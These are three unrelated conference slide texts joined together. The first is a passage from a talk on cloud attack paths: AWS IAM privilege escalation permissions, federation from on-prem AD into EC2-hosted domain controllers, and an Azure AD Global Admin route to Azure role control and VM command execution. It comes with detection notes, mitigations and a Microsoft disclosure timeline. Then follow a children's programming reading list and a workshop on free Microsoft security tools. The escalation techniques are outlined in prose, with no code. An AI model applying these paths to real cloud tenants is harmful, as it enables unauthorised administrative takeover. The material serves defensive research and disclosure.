Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full
administrator privileges in the AWS environment.
•
Creating/updating an inline policy for a role (iam:PutRolePolicy)
•
Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full
administrator privileges in the AWS environment.
•
Adding a user to a group (iam:AddUserToGroup)
•
The attacker would be able to gain privileges of any existing group in the account, which could range from no privilege escalation to full administrator access to the account.
•
Updating the AssumeRolePolicyDocument of a role (iam:UpdateAssumeRolePolicy)
•
This would give the attacker the privileges that are attached to any role in the account, which could range from no privilege escalation to full administrator access to the account.
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py
Sean Metcalf | @PyroTek3 | [email protected]
Cloud API Keys
• Provide permanent access, often with privileged rights.
• Often provides additional authentication access method
(other than username/password)
• API keys are frequently exposed in code (Github), including
private repositories.
• Compromised API keys need to be regenerated.
Sean Metcalf | @PyroTek3 | [email protected]
Compromise Cloud
Hosted DCs
Via AWS /Federation
https://aws.amazon.com/blogs/security/aws-federated-authentication-with-active-directory-federation-services-ad-fs/
AWS Federated Authentication with Active
Directory Federation Services (AD FS)
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
AD
AWS EC2
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
AD
AWS EC2
On-Prem
AD
Domain
Controller
On-Prem
AD
Domain
Controller
AWS IAM Role:
AWS EC2 Administration
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
AD
AWS EC2
Federation
On-Prem
AD
Domain
Controller
On-Prem
AD
Domain
Controller
AWS IAM Role:
AWS EC2 Administration
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
AD
AWS EC2
AD Group:
AWS EC2 Admins
Federation
On-Prem
AD
Domain
Controller
On-Prem
AD
Domain
Controller
AWS IAM Role:
AWS EC2 Administration
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
AD
AWS EC2
AD Group:
AWS EC2 Admins
Federation
On-Prem
AD
Domain
Controller
On-Prem
AD
Domain
Controller
AWS IAM Role:
AWS EC2 Administration
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
AD
AWS EC2
AD Group:
AWS EC2 Admins
Federation
On-Prem
AD
Domain
Controller
On-Prem
AD
Domain
Controller
AWS IAM Role:
AWS EC2 Administration
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
AD
AWS EC2
AD Group:
AWS EC2 Admins
Federation
On-Prem
AD
Domain
Controller
On-Prem
AD
Domain
Controller
AWS IAM Role:
AWS EC2 Administration
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
AD
AWS EC2
AD Group:
AWS EC2 Admins
Federation
On-Prem
AD
Domain
Controller
On-Prem
AD
Domain
Controller
AWS IAM Role:
AWS EC2 Administration
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem AD Account -> AWS Federation ->
Compromise On-Prem AD Summary
• On-prem AD Domain Controllers are hosted in AWS EC2
• On-prem AD groups are added to AWS Roles
• Compromise on-prem AD user account to compromise AWS EC2
instances (VMs) to run stuff on DCs
• Amazon SSM installed by default on most Amazon provided
instances (template) – need role to execute
• Hopefully you are logging this and looking at the logs (CloudTrail)
And the Logs can’t be deleted.
Sean Metcalf | @PyroTek3 | [email protected]
From Azure AD
to Azure
An Unanticipated Attack Path
Note that it’s possible that Microsoft has made changes to elements described in
this section since I performed this research and reported the issue.
https://adsecurity.org/?p=4277
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | sean@trimarc
Sean Metcalf | @PyroTek3 | [email protected]
Updated docs
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
Access
Management
for Azure
Resources
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
https://docs.microsoft.com/en-us/azure/role-based-access-control/elevate-access-global-admin
Sean Metcalf | @PyroTek3 | [email protected]
Except…
Sean Metcalf | @PyroTek3 | [email protected]
Elevate
Access API
Sean Metcalf | @PyroTek3 | [email protected]
https://github.com/hausec/PowerZure
Sean Metcalf | @PyroTek3 | [email protected]
Compromise Office 365 Global Admin
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
(Office 365)
Global Admin
(Azure)
User Access
Administrator
Sean Metcalf | @PyroTek3 | [email protected]
Hacker Account Added to User Access Administrator
Sean Metcalf | @PyroTek3 | [email protected]
Azure RBAC Role Monitoring
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
What About Removal?
Sean Metcalf | @PyroTek3 | [email protected]
Get Azure Owner Rights!
Sean Metcalf | @PyroTek3 | [email protected]
Virtual
Machine
Contributor
“… lets you manage virtual
machines, but not access to
them, and not the virtual
network or storage account
they're connected to.”
https://docs.microsoft.com/en-us/azure/role-
based-access-control/built-in-roles#virtual-
machine-contributor
Sean Metcalf | @PyroTek3 | [email protected]
Virtual
Machine
Contributor
“… lets you manage virtual
machines, but not access to
them, and not the virtual
network or storage account
they're connected to.”
https://docs.microsoft.com/en-us/azure/role-
based-access-control/built-in-roles#virtual-
machine-contributor
Sean Metcalf | @PyroTek3 | [email protected]
Microsoft.Compute/
virtualMachines/
runCommand/
Add Attacker Controlled Account to Virtual
Machine Contributor
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
(Office 365)
Global Admin
(Azure)
User Access
Administrator
(Azure)
Subscription Admin
Add to Role
Sean Metcalf | @PyroTek3 | [email protected]
Separation of
Administration
• Companies often have 2 groups managing
different systems.
• One team typically manages Active
Directory & Azure AD.
• Another team typically manages servers
on-prem and in the cloud (IAAS).
• These teams expect that they have
exclusive control of their respective areas.
Sean Metcalf | @PyroTek3 | [email protected]
Why is this
issue
important?
• Customers usually have no expectation that an Office
365 Global Administrator has the ability to control
Azure role membership.
• Microsoft documented Global Administrator as an
“Office 365 Admin”, not as an Office 365 & potential
Azure administrator.
• Office 365 (Azure AD) Global Administrators can gain
Azure subscription role administration access by
toggling a single switch.
• Azure doesn’t have great granular control over who can
run commands on Azure VMs that are sensitive like
Azure hosted Domain Controllers.
• Once the “Access management for Azure resources” bit
is set, it stays set until the account that toggled the
setting to “Yes” later changes it to “No”.
• Removing the account from Global Administrators does
not remove the account from “User Access
Administrator” access either.
Sean Metcalf | @PyroTek3 | [email protected]
Detection Key Points
• Can’t detect this setting on Azure AD user accounts using PowerShell,
portal, or other method.
• No Office 365/Azure AD logging I can find that states that an Azure AD
account has set this bit (“Access management for Azure resources”).
• No (Azure AD/O365) Audit Logs logging that clearly identifies this change.
• Core Directory, DirectoryManagement “Set Company Information” Log
shows success for the tenant name and the account that performed it.
However, this only identifies that something changed relating to “Company
Information” – no detail logged other than “Set Company Information” and
in the event the Modified Properties section is empty stating “No modified
properties”.
• Didn’t find any default Azure logging after adding this account to the VM
Contributor role in Azure.
Sean Metcalf | @PyroTek3 | [email protected]
Azure AD to Azure Mitigation
Monitor the Azure AD role “Global Administrator” for membership changes.
Monitor
Enforce MFA on all accounts in the Global Administrator role.
Enforce
Control the Global Administrator role with Azure AD Privileged Identity
Manager (PIM).
Control
Monitor the Azure RBAC role “User Access Administrator” for membership
changes.
Monitor
Ensure sensitive systems like Domain Controllers in Azure are isolated and
protected as much as possible.
Ideally, use a separate tenant for sensitive systems.
Ensure
Sean Metcalf | @PyroTek3 | [email protected]
MSRC Reporting Timeline
• Reported to Microsoft in September 2019.
• MSRC responds in early October 2019:
“Based on [internal] conversations this appears to be By Design and the documentation is being
updated. “
• Sent MSRC additional information in mid October 2019 after a day of testing detection and
potential logging.
• MSRC responds that “most of what you have is accurate”
• Sent MSRC update in late January 2020 letting them know that I would be submitting this as part
of a larger presentation to Black Hat USA & DEF CON.(2020).
• MSRC acknowledges.
• Sent MSRC notification that I would be sharing this information in this blog.
• Documentation updated – June 2020.
• MSRC Security incident still open as of July 2020.
I was informed by Microsoft during my interactions with MSRC that they are looking into re-working this
functionality to resolve some of the shortcomings I identified.
Sean Metcalf | @PyroTek3 | [email protected]
How bad can this get?
Sean Metcalf | @PyroTek3 | [email protected]
How bad can this get?
Sean Metcalf | @PyroTek3 | [email protected]
How bad can this get?
Attacker takes control of Azure resources
Removes accounts from all Roles
Ransom the Azure environment
Azure Ransomware?
AzureWare?
Sean Metcalf | @PyroTek3 | [email protected]
Next Level
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
Datacenter
Azure
AWS
Google Cloud Platform
(GCP)
Federation
Server
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
Datacenter
Azure
AWS
Google Cloud Platform
(GCP)
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
Datacenter
Azure
AWS
Google Cloud Platform
(GCP)
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
Datacenter
Azure
AWS
Google Cloud Platform
(GCP)
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem
Datacenter
Azure
AWS
Google Cloud Platform
(GCP)
“Don’t want all my eggs in one
basket…
Sean Metcalf | @PyroTek3 | [email protected]
So now eggs are in all baskets.”
Sean Metcalf (@PyroTek3)
s e a n @ Trimarc Security . com
www.ADSecurity.org
TrimarcSecurity.com
Slides: Presentations.ADSecurity.org
Sean Metcalf | @PyroTek3 | [email protected]
• Given that cloud IAAS is similar to on-prem
virtualization, cloud attacks are similar as well
• Connection points between on-prem & cloud
need to be carefully considered.
• Domain Controllers can be vulnerable no
matter where they are located (on-prem & in
the cloud).
• Authentication flows between on-prem & cloud
(and Cloud to Cloud!) can be vulnerable.
• Protecting admin accounts is even more
important in a cloud-enabled world.
Recommendations
References
•
GCP KVM reference
https://cloud.google.com/compute/docs/faq
•
Airbus Security – ILO
https://github.com/airbus-seclab/ilo4_toolbox
•
AWS Managed AD
https://docs.aws.amazon.com/directoryservice/latest/admin-guide/directory_microsoft_ad.html
•
Azure AD Domain Services
https://azure.microsoft.com/en-us/services/active-directory-ds/
•
GCP Managed AD
https://cloud.google.com/managed-microsoft-ad
•
Amazon AD Connector
https://aws.amazon.com/blogs/security/how-to-connect-your-on-premises-active-directory-to-aws-using-ad-connector/
•
Microsoft PTA
https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta
•
Attacking Microsoft PTA & Azure AD Connect
https://blog.xpnsec.com/azuread-connect-for-redteam/
•
Azure AD Seamless SSO
https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso
•
Attacking Azure AD Seamless SSO
https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/
•
Rhino Security Labs - AWS IAM Privileged Escalation Methods
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/
https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py
•
From Azure AD to Azure: An Unanticipated Attack Path
https://adsecurity.org/?p=4277
•
Introducing ROADtools - The Azure AD exploration framework
https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/
•
Dirk-jan Mollema’s talks
https://dirkjanm.io/talks/
Sean Metcalf | @PyroTek3 | [email protected] | pdf |
The Six Year Old Hacker: References and resources:
Educational Theory, Piaget, Montessori, Papert and others:
http://education.indiana.edu/~p540/webcourse/develop.html
http://www.ship.edu/~cgboeree/piaget.html
http://www.montessori.edu/
http://www.montessori.org/
Stoll Lillard, Angeline; Montessori: The Science Behind the Genius (Oxford
University Press 2005)
http://www.papert.org/
Papert, Seymour; Mindstorms: Children, Computers, and Powerful Ideas,
(Basic Books 1999)
Papert, Seymour; Constructionism Research Reports and Essays, 1985-1990
(Greenwood Pub Group 1991)
Programing:
LOGO Foundation.
http://el.media.mit.edu/logo-foundation/
UCB LOGO, runs under several OSs. A good source for serious LOGO programing
texts.
http://www.cs.berkeley.edu/~bh/logo.html
Windows version of LOGO derived from UCB LOGO. Runs well under Wine. Good
links.
http://www.softronix.com/logo.html
Two good sources for programing projects. Life and CoreWar!
Dewdney, A. K.; Armchair Universe: An Exploration of Computer Worlds (New
York: W. H Freeman & Co 1988)
Dewdney, A. K.; The Tinkertoy Computer and Other Machinations: Computer
Recreations... (New York:W. H Freeman & Co 1993) | pdf |
DEF CON 24
4 August
Las Vegas, USA
ME & VULNEX
Simon Roses Femerling
•
Founder & CEO, VULNEX www.vulnex.com
•
@simonroses
•
Former Microsoft, PwC, @Stake
•
US DARPA award to research on software security
•
Speaker: Black Hat, RSA, HITB, OWASP, SOURCE, AppSec,
DeepSec, TECHNET
•
Blog: http://www.simonroses.com/
•
Youtube:
https://www.youtube.com/channel/UC8KUXxTSEdWfpFzAydjEzyQ
•
CyberSecurity Startup
•
@vulnexsl
•
Professional Services & Training
•
Products: BinSecSweeper (Unified File Security Analysis)
VULNEX
DISCLAIMER & LICENSE
• All Tools and resources are property
of Microsoft and their authors
• Non-affiliated with Microsoft
WORKSHOP OBJECTIVES
• What has Microsoft to offer?
• How to improve our security posture
for free!
• Development and IT Security
AGENDA
1. Introduction
2. Secure Development
3. IT Security
4. Conclusions
1. DEVELOPERS VS SYSADMINS VS ALL…
1. FATAL ERROR
1. DEFENSE IN DEPTH
1. MEMO FROM BILL GATES
• https://news.microsoft.com/2012/01
/11/memo-from-bill-
gates/#sm.001he6hz618bod7bz7k10
g0w76fr0
1. MICROSOFT SDL
• The Security Development Lifecycle
(SDL) is a software development
process that helps developers build
more secure software and address
security
compliance
requirements
while reducing development cost
• https://www.microsoft.com/en-
us/SDL
1. MICROSOFT SDL
1. SDL: TRAINING
• SDL Practice #1: Core Security
Training
This practice is a prerequisite for
implementing the SDL. Foundational
concepts for building better software
include secure design, threat
modeling, secure coding, security
testing, and best practices
surrounding privacy
1. SDL: REQUIREMENTS
•
SDL
Practice
#2:
Establish
Security
and
Privacy
Requirements
Defining and integrating security and privacy requirements early
helps make it easier to identify key milestones and deliverables
and minimize disruptions to plans and schedules.
•
SDL
Practice
#3:
Create
Quality
Gates/Bug
Bars
Defining minimum acceptable levels of security and privacy
quality at the start helps a team understand risks associated with
security issues, identify and fix security bugs during development,
and apply the standards throughout the entire project.
•
SDL Practice #4: Perform Security and Privacy Risk
Assessments
Examining software design based on costs and regulatory
requirements helps a team identify which portions of a project will
require threat modeling and security design reviews before
release and determine the Privacy Impact Rating of a feature,
product, or service.
1. SDL: DESIGN
•
SDL Practice #5: Establish Design Requirements
Considering security and privacy concerns early helps
minimize the risk of schedule disruptions and reduce a
project's expense.
•
SDL Practice #6: Attack Surface Analysis/Reduction
Reducing the opportunities for attackers to exploit a potential
weak spot or vulnerability requires thoroughly analyzing
overall attack surface and includes disabling or restricting
access to system services, applying the principle of least
privilege, and employing layered defenses wherever possible.
•
SDL
Practice
#7:
Use
Threat
Modeling
Applying a structured approach to threat scenarios during
design helps a team more effectively and less expensively
identify security vulnerabilities, determine risks from those
threats, and establish appropriate mitigations.
1. SDL: IMPLEMENTATION
•
SDL
Practice
#8:
Use
Approved
Tools
Publishing a list of approved tools and associated security checks
(such as compiler/linker options and warnings) helps automate
and enforce security practices easily at a low cost. Keeping the list
regularly updated means the latest tool versions are used and
allows inclusion of new security analysis functionality and
protections.
•
SDL
Practice
#9:
Deprecate
Unsafe
Functions
Analyzing all project functions and APIs and banning those
determined to be unsafe helps reduce potential security bugs with
very little engineering cost. Specific actions include using header
files, newer compilers, or code scanning tools to check code for
functions on the banned list, and then replacing them with safer
alternatives.
•
SDL
Practice
#10:
Perform
Static
Analysis
Analyzing the source code prior to compile provides a scalable
method of security code review and helps ensure that secure
coding policies are being followed.
1. SDL: VERIFICATION
•
SDL
Practice
#11:
Perform
Dynamic
Analysis
Performing
run-time
verification
checks
software
functionality using tools that monitor application behavior
for memory corruption, user privilege issues, and other
critical security problems.
•
SDL
Practice
#12:
Fuzz
Testing
Inducing
program
failure
by
deliberately
introducing
malformed or random data to an application helps reveal
potential security issues prior to release while requiring
modest resource investment.
•
SDL
Practice
#13:
Attack
Surface
Review
Reviewing
attack
surface
measurement
upon
code
completion helps ensure that any design or implementation
changes to an application or system have been taken into
account, and that any new attack vectors created as a
result of the changes have been reviewed and mitigated
including threat models.
1. SDL: RELEASE
•
SDL Practice #14: Create an Incident Response Plan
Preparing an Incident Response Plan is crucial for helping to
address new threats that can emerge over time. It includes
identifying
appropriate
security
emergency
contacts
and
establishing security servicing plans for code inherited from other
groups within the organization and for licensed third-party code.
•
SDL
Practice
#15:
Conduct
Final
Security
Review
Deliberately reviewing all security activities that were performed
helps ensure software release readiness. The Final Security
Review (FSR) usually includes examining threat models, tools
outputs, and performance against the quality gates and bug bars
defined during the Requirements Phase.
•
SDL
Practice
#16:
Certify
Release
and
Archive
Certifying software prior to a release helps ensure security and
privacy requirements were met. Archiving all pertinent data is
essential for performing post-release servicing tasks and helps
lower the long-term costs associated with sustained software
engineering.
1. SDL: RESPONSE
• SDL
Practice
#17:
Execute
Incident
Response
Plan
Being able to implement the Incident
Response
Plan
instituted
in
the
Release phase is essential to helping
protect
customers
from
software
security or privacy vulnerabilities
that emerge.
1. REDUCING VULNERABILITIES
1. REDUCING COSTS
1. SYSINTERNALS
• Not about Sysinternals suite
• Awesome tools!
• https://technet.microsoft.com/en-
us/sysinternals/bb545021
2. AVAILABLE SECURE DEVELOPMENT TOOLS
1.
Microsoft Solutions Framework (MSF) for Capability Maturity
Model Integration (CMMI) 2013 plus Security Development
Lifecycle (SDL)
2.
Microsoft Solutions Framework (MSF) for Agile 2013 plus
Security Development Lifecycle (SDL)
3.
TM SDL 2016
4.
AntiXSS
5.
Visual Studio 2012 / 2015
6.
FXCOP
7.
CAT.NET
8.
SDL REGEX FUZZER
9.
SDL MINIFUZZ
10. App Verifier
11. BinScope
12. Binskim
2.
TOOL:
MICROSOFT
SOLUTIONS
FRAMEWORK
(MSF)
FOR
CAPABILITY
MATURITY MODEL
INTEGRATION
(CMMI)
2013 PLUS
SECURITY DEVELOPMENT LIFECYCLE (SDL)
•
Version: 1.0
•
Downloadable template that integrates the Microsoft Security
Development Lifecycle (SDL) directly into your Visual Studio Team
Foundation Server 2013 software development environment.
•
Requires Visual Studio Team Foundation Server 2013
•
More info: https://www.microsoft.com/en-
us/SDL/adopt/processtemplate.aspx
Download: https://www.microsoft.com/en-
us/download/details.aspx?id=42519
2.
TOOL:
MICROSOFT
SOLUTIONS
FRAMEWORK
(MSF)
FOR
CAPABILITY
MATURITY MODEL
INTEGRATION
(CMMI)
2013 PLUS
SECURITY DEVELOPMENT LIFECYCLE (SDL)
FEATURES
SDL requirements
SDL policies
Custom vulnerabilities queries
SDL guides & resources
Final Security Review (FSR) report
Third party tool integration
Security templates
2.
TOOL:
MICROSOFT
SOLUTIONS
FRAMEWORK
(MSF)
FOR
CAPABILITY
MATURITY MODEL INTEGRATION (CMMI) 2013
PLUS
SECURITY DEVELOPMENT LIFECYCLE (SDL)
2.
TOOL:
MICROSOFT
SOLUTIONS
FRAMEWORK
(MSF)
FOR
CAPABILITY
MATURITY MODEL INTEGRATION (CMMI) 2013
PLUS
SECURITY DEVELOPMENT LIFECYCLE (SDL)
2.
TOOL:
MICROSOFT
SOLUTIONS
FRAMEWORK
(MSF)
FOR AGILE 2013 PLUS SECURITY DEVELOPMENT LIFECYCLE (SDL)
• Version: 1.0
• Same as before but for Agile development
• Requires Visual Studio Team Foundation
Server 2013
• More info: https://www.microsoft.com/en-
us/SDL/adopt/agile.aspx
Download: https://www.microsoft.com/en-
us/download/details.aspx?id=42517
2.
TOOL:
MICROSOFT
SOLUTIONS
FRAMEWORK
(MSF)
FOR AGILE 2013 PLUS SECURITY DEVELOPMENT LIFECYCLE (SDL)
2. TOOL: SDL TM 2016
•
Version: 2016
•
Threat Modeling
•
Find threats during design phase, determine threats and define
appropriate
mitigations
and
distribute
security
tasks
across
stakeholders
•
More info: https://blogs.microsoft.com/cybertrust/2015/10/07/whats-
new-with-microsoft-threat-modeling-tool-2016/
Download: https://www.microsoft.com/en-
us/download/details.aspx?id=49168
2. TOOL: SDL TM 2016
2. TOOL: SDL TM 2016
STRIDE
Spoofing
Tampering
Repudiation
Information Disclosure
Elevation of Privilege
2. TOOL: SDL TM 2016
2. TOOL: BANNED.H
• Version: 2.0
• Insecure functions banned by the SDL
• Visual Studio replaces them under the
hood by a more secure version
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=24817
2. TOOL: BANNED.H
2. TOOL: ANTIXSS
•
Version: 4.3
•
Library to mitigate the potential of Cross-Site Scripting (XSS)
attacks in web-based applications
•
AKA: Microsoft Web Protection Library
•
Two components:
– Development library
– Security Runtime Engine (SRE) – XSS y SQLi
•
Included by default starting .NET 4.0 (Standalone end of life)
https://msdn.microsoft.com/en-
us/library/system.web.security.antixss.antixssencoder(v=vs.110
).aspx
•
More info:
https://wpl.codeplex.com/
https://www.microsoft.com/en-
us/download/details.aspx?id=28589
2. TOOL: ANTIXSS
Method
Description
HtmlEncode
Decodes a value from an HTML-
encoded string
HtmlAtributeEncode
Encodes and outputs the
specified string for use in an
HTML attribute
XmlEncode
Encodes the specified string for
use in XML attributes
XmlAtributeEncode
Encodes the specified string for
use in XML attributes
UrlEncode
Encodes the specified string for
use in a URL
UrlPathEncode
Encodes path strings for use in a
URL
JavaScriptEncode
Encodes a string
2. TOOL: ANTIXSS
1. Use
2. Example
2. TOOL : VISUAL STUDIO 2015
•
Version: 2015
•
Microsoft Development Environment
•
More info:
https://www.visualstudio.com
•
VS Secure Documentation:
https://msdn.microsoft.com/en-us/library/k3a3hzw7.aspx
https://msdn.microsoft.com/en-us/library/jj161081.aspx
https://msdn.microsoft.com/en-us/library/4cftbc6c.aspx
2. TOOL: VISUAL STUDIO 2015
VS SECURITY FLAGS
DESCRIPTION
/guard
Analyze control flow for indirect call targets at
compile time
/GS
Insert overrun detection code into functions that
are at risk of being exploited
/SAFESEH
Prevent the execution of exception handlers that
are introduced by a malicious attack
/NXCOMPAT
DEP guards the CPU against the execution of
non-code pages
/analyze
Reports potential security issues such as buffer
overrun, un-initialized memory, null pointer
dereferencing, and memory leaks
/DYNAMICBASE
Address Space Layout Randomisation
/SDL
Enables a superset of the baseline security
checks (Compile-time & Runtime checks)
2. TOOL: VISUAL STUDIO 2015
/SDL – Compile-time checks
2. TOOL: VISUAL STUDIO 2015
/SDL – Runtime checks
Enables the strict mode of /GS run-time buffer overrun detection
Performs limited pointer sanitization
Performs class member initialization
2. TOOL : VISUAL STUDIO 2015
• Note: Visual Studio 2015 Update 1 and
2 add telemetry function calls into
binaries
• Compile from command line to remove
functionality:
– notelemetry.obj
• https://www.reddit.com/r/cpp/commen
ts/4ibauu/visual_studio_adding_teleme
try_function_calls_to/d30dmvu
2. TOOL: VISUAL STUDIO 2015
2. TOOL: FXCOP
• Version: 10.0
• Static code analysis for managed
applications
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=8279
2. TOOL: FXCOP
FXCOP RULES
COM
Design
Globals
Names
Performances
Security
Interaction between managed and native code
.NET Code Access Security
Exposed interfaces in code
Best practices
Memory
2. TOOL: FXCOP
2. TOOL: CAT.NET
• Version: 2.0
• .NET static analysis (source code / binaries)
• GUI and Command Line
• Download: https://www.microsoft.com/en-
us/download/details.aspx?id=5570 (v1 x64)
http://blogs.msdn.com/b/securitytools/archi
ve/2009/11/12/how-to-run-cat-net-2-0-
ctp.aspx (v2 Beta)
2. TOOL: CAT.NET
CAT.NET SECURITY RULES
Cross-Site Scripting (XSS)
SQL Injection
LDAP Injection
XPATH Injection
Redirections
Process Command Execution
File Canonicalization
Exception Disclosure
2. TOOL: CAT.NET
OWASP TOP 10 - 2013
A1 - Injection
A2 – Broken Authentication and Session Management
A3 – Cross-Site Scripting (XSS)
A4 – Insecure Direct Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery (CSRF)
A9 – Using Known Vulnerable Components
A10 – Unvalidated Redirects and Forwards
2. TOOL: CAT.NET
2. TOOL: CAT.NET
2. TOOL: SDL REGEX FUZZER
• Version: 1.1.0
• Regular expression (REGEX) fuzzer
to identify DoS
• Download:
http://www.microsoft.com/en-
us/download/details.aspx?id=20095
2. TOOL: SDL REGEX FUZZER
2. TOOL: SDL REGEX FUZZER
2. TOOL: SDL REGEX FUZZER
2. TOOL: SDL MINIFUZZ
• Version: 1.5.5.0
• Command line fuzzer
• Easy to use
• Download: www.microsoft.com/en-
us/download/details.aspx?id=21769
2. TOOL: SDL MINIFUZZ
2. TOOL: SDL MINIFUZZ
2. TOOL: APP VERIFIER
• Version: 4.0.665
• Runtime bug catcher
• Analyze C++ programs
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=20028
2. TOOL: APP VERIFIER
APP VERIFIER RULES
Heaps
Handles
Locks
TLS
Memory
Exceptions
Threadpool
Low Resources simulation
2. TOOL: APP VERIFIER
2. TOOL: APP VERIFIER
2. TOOL: APP VERIFIER
2. TOOL: BINSCOPE
• Version: 2014
• Analyzes binaries for SDL compilation best
practices (Managed and native)
• Last version command line only
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=44995
2. TOOL: BINSCOPE
BINSCOPE RULES
Missing Build Time Flags
/GS
/SAFESEH
/NXCOMPAT
/DYNAMICBASE
Binary Features
Global function pointers
Shared read/write sections
Partially trusted called managed assemblies
Compiler version
2. TOOL: BINSCOPE
BINSCOPE CHECK
SDL
AppContainerCheck (Required for
Windows Store Certification)
NO
ATLVersionCheck
YES
ATLVulnCheck
YES
CompilerVersionCheck
YES
DBCheck
YES
DefaultGSCookieCheck
YES
ExecutableImportsCheck
YES
FunctionPointersCheck
NO
GSCheck
YES
GSFriendlyInitCheck
YES
GSFunctionSafeBuffersCheck
YES
HighEntropyVACheck
YES
2. TOOL: BINSCOPE
BINSCOPE CHECK
SDL
NXCheck
YES
RSA32Check
YES
SafeSEHCheck
YES
SharedSectionCheck
YES
VB6Check
YES
WXCheck
YES
2. TOOL: BINSCOPE
2. TOOL: BINSCOPE
2. TOOL: BINSCOPE
2. TOOL: BINSKIM
• Version: 1.3.4
• Binary static analysis tool that provides
security and correctness results for
Windows portable executables
• Download:
https://github.com/Microsoft/binskim
2. TOOL: BINSKIM
RULES
Crypto Errors
Security mitigations enabled
Vulnerable libraries
Etc.
2. TOOL: BINSKIM
• Compilation process:
1. Clone / Download code
2. Load src/BinSkim.sln in Visual Studio
2015
3. Set to release mode
4. Build
2. TOOL: BINSKIM
3. AVAILABLE IT SECURITY TOOLS
1. SECURITY ESSENTIALS / WINDOWS
DEFENDER
2. MBSA
3. Microsoft Security Assessment Tool
4. Microsoft Security Compliance Manager
5. WACA
6. Attack Surface Analyzer
7. Portqry
8. EMET
9. Message Analyzer
3. TOOL: SECURITY ESSENTIALS / WINDOWS
DEFENDER
• Version: Windows 10
• Identifies and remove malware
• Security Essentials or Windows Defender:
– Windows 7, Vista and XP: Windows Defender only
removes spyware. You must install Security
Essentials
– Windows 8 or later: Windows Defender by default
in OS, removes malware
• Download: http://windows.microsoft.com/es-
es/windows/security-essentials-download
3. TOOL: SECURITY ESSENTIALS / WINDOWS
DEFENDER
3. TOOL: SECURITY ESSENTIALS / WINDOWS
DEFENDER
3. TOOL: SECURITY ESSENTIALS / WINDOWS
DEFENDER
3. TOOL: MBSA
• Version: 2.3
• Microsoft Baseline Security Analyzer
(MBSA)
• Security scanner for Windows
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=7558
3. TOOL: MBSA
• Scans for:
– Windows administration vulnerabilities
– Weak passwords
– IIS administration vulnerabilities
– SQL administrative vulnerabilities
• Can configure Windows Update on
scanned systems
3. TOOL: MBSA
3. TOOL: MBSA
3. TOOL: MBSA
3. TOOL: MBSA
3. TOOL: MICROSOFT SECURITY ASSESSMENT TOOL
• Version: 4.0
• Risk-assessment application designed to
provide information and recommendations
about best practices for security within an
information technology (IT) infrastructure
• Download:
https://www.microsoft.com/en-
us/download/details.aspx?id=12273
3. TOOL: MICROSOFT SECURITY ASSESSMENT TOOL
3. TOOL: MICROSOFT SECURITY COMPLIANCE
MANAGER
• Version: 3.0
• Provides
centralized
security
baseline
management features, a baseline portfolio,
customization
capabilities,
and
security
baseline export flexibility to accelerate your
organization’s ability to efficiently manage the
security and compliance process for the most
widely used Microsoft technologies
• Download: https://www.microsoft.com/en-
us/download/details.aspx?id=16776
3. TOOL: MICROSOFT SECURITY COMPLIANCE
MANAGER
• Note: SCM Version 3.0 do not install on
Windows 10 due to incompatible SQL
Server 2008 Express
However if you install SQL Server 2008
R2 Express Edition standalone, you
then can install SCM in Windows 10
https://www.microsoft.com/en-
US/download/details.aspx?id=30438
3. TOOL: MICROSOFT SECURITY COMPLIANCE
MANAGER
3. TOOL: MICROSOFT SECURITY COMPLIANCE
MANAGER
3. TOOL: MICROSOFT SECURITY COMPLIANCE
MANAGER
3. TOOL: WACA
• Version: 2.0
• Microsoft Web Application Configuration
Analyzer
• Download:
http://www.microsoft.com/en-
us/download/details.aspx?id=573
3. TOOL: WACA
WACA RULES
General Application Rules (62)
IIS Application Rules (75)
SQL Application Rules (22)
3. TOOL: WACA
3. TOOL: WACA
3. TOOL: WACA
3. TOOL: WACA
